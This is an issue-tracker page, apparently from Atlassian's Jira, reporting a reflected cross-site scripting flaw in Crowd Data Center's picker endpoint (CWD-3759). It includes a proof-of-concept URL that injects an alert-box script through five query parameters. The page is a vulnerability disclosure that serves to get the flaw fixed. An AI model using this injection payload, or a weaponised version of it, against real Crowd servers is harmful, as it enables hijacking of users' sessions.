Uploaded image for project: 'Crowd Data Center'
  1. Crowd Data Center
  2. CWD-3759

Cross Site Scripting vulnerabilities in Pickers

    XMLWordPrintable

Details

    Description

      Currently, the confluence picker does not sanitize the input ( <crowd-url>/crowd/console/secure/pickers/displayPicker.action).

      Proof of concept.

      1. Access the following URL in your browser with javascript enabled. Replace the <crowd-url> with your crowd URL.

        <crowd-url>/crowd/console/secure/pickers/displayPicker.action?searchURL=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&actionURL=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&actionName=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&initialMessage=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&finalURL=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E

      2. You will see the following alert:

      Attachments

        Issue Links

          relates to

          CWDSUP-8689 Loading...

          Activity

            People

              jwalton joe
              jcheok Jing Hwa Cheok (Inactive)
              Votes:
              1 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: